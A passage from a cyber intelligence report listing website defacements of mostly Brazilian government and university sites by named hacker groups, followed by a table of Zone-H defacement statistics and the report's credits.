ProtoWave Reloaded www.palestinadegoias.go.gov.br Linux mirror
ProtoWave Reloaded www.tj.ba.gov.br/precregespecial/ Linux mirror
ProtoWave Reloaded www.tjba.jus.br/precregespecial/ Linux mirror
ProtoWave Reloaded www.turvelandia.go.gov.br Linux mirror
ProtoWave Reloaded www2.tj.ba.gov.br/precregespec... Linux mirror
ProtoWave Reloaded www2.tjba.jus.br/precregespecial/ Linux mirror
ProtoWave Reloaded www5.ensp.fiocruz.br/etica/coo... Linux mirror
Security Attack www.saeourinhos.sp.gov.br Win 2008 mirror
Sh33t www.camaramuitoscapoes.rs.gov.br Linux mirror
Silver Lords www.benjaminconstant.am.gov.br Linux mirror
Silver Lords www.boaesperanca.pr.gov.br Linux mirror
Silver Lords www.brasilnovo.pa.gov.br Linux mirror
Silver Lords www.camaratupaciguara.mg.gov.br Linux mirror
Silver Lords www.campinapolis.mt.gov.br Linux mirror
Cyber Intelligence Report
CyberSec.TV 19 | P a g e
Silver Lords www.capivaridosul.rs.gov.br Linux mirror
Silver Lords www.cerrogrande.rs.gov.br Linux mirror
Silver Lords www.chapadadonorte.mg.gov.br Linux mirror
Silver Lords www.cmranchoalegre.pr.gov.br Linux mirror
Silver Lords www.douradina.pr.gov.br Linux mirror
Silver Lords www.exu.pe.gov.br Linux mirror
Silver Lords www.franciscobadaro.mg.gov.br Linux mirror
Silver Lords www.gedott.unifesp.br/images/j... Linux mirror
Silver Lords www.iapu.mg.gov.br Linux mirror
Silver Lords www.itambedomatodentro.mg.gov.br Linux mirror
Silver Lords www.jacupiranga.sp.gov.br Linux mirror
Silver Lords www.jequitiba.mg.gov.br Linux mirror
Silver Lords www.jordao.ac.gov.br Linux mirror
Silver Lords www.monteazulpaulista.sp.gov.br Linux mirror
Silver Lords www.palmarespaulista.sp.gov.br Linux mirror
Silver Lords www.pedrinopolis.mg.gov.br Linux mirror
Silver Lords www.piracaia.sp.gov.br Linux mirror
Silver Lords www.pontalinda.sp.gov.br Linux mirror
Silver Lords www.riopardo.mg.gov.br Linux mirror
Silver Lords www.ruropolis.pa.gov.br Linux mirror
Silver Lords www.santoexpedito.sp.gov.br Linux mirror
skizo dio.es.gov.br/webroot Win 2008 mirror
Sons of Anarchy www.ce.senac.br/trabalhe-conosco/ F5 Big-IP mirror
Spy_Unkn0wn antares.ucpel.tche.br/cic/ Linux mirror
Spy_Unkn0wn intranet.ucpel.tche.br/cic/ Linux mirror
Trev0rR00t www.camaradeconceicao.pb.gov.br Linux mirror
v0ldsec revitec2.cpafac.embrapa.br Linux mirror
VandaTheGod desenvolvimento.aracatuba.sp.g... Linux mirror
Xaveroz_Tersakiti gestaoesaude.unb.br Linux mirror
Xaveroz_Tersakiti www.sied-enped2016.ead.ufscar.br Linux mirror
Cyber Intelligence Report
CyberSec.TV 20 | P a g e
Zone-H attaCk statistiCs:
N° Notifier Single def. Mass def. Total def. Homepage def. Subdir def.
1. Barbaros-DZ 3449 157 3606 1224 2382
2. Ashiyane Digital Security Team 3077 4260 7337 1395 5942
3. Hmei7 2867 1513 4380 775 3605
4. LatinHackTeam 1438 1266 2704 2254 450
5. iskorpitx 1324 955 2279 786 1493
6. Fatal Error 1212 2169 3381 3001 380
7. HighTech 1084 4133 5217 4209 1008
8. oroboruo 956 1120 2076 1579 497
9. chinahacker 889 1344 2233 4 2229
10. MCA-CRB 854 626 1480 374 1106
11. By_aGReSiF 759 1431 2190 804 1386
12. Index Php 713 286 999 228 771
13. 3n_byt3 674 1955 2629 929 1700
14. HEXB00T3R 614 622 1236 407 829
15. brwsk007 612 261 873 31 842
16. d3b~X 606 642 1248 64 1184
17. Red Eye 605 1568 2173 2133 40
18. Swan 590 271 861 264 597
19. uykusuz001 561 153 714 38 676
20. 1923Turk 553 1618 2171 471 1700
21. Dr.SHA6H 546 1302 1848 1501 347
22. Mafia Hacking Team 519 680 1199 330 869
23. Over-X 517 1783 2300 1390 910
24. ZoRRoKiN 507 312 819 249 570
25. Digital Boys Underground Team 476 446 922 190 732
Cyber Intelligence Report
CyberSec.TV 21 | P a g e
Credits: Jeremy Martin, IWC: Sr. Editor, Author, Designer, Threat Researcher Amy Martin, IWC: Editor Steve Williams, Scot Bradeen, CF360: Editor Elisabeth Martin, IWC: Editor
sponsors: Information Warfare Center (IWC): www.informationwarfarecenter.com Cyber Forensics 360 (CF360): www.cyberforensics360.com Cyber Secrets: www.YouTube.com/iwccybersec
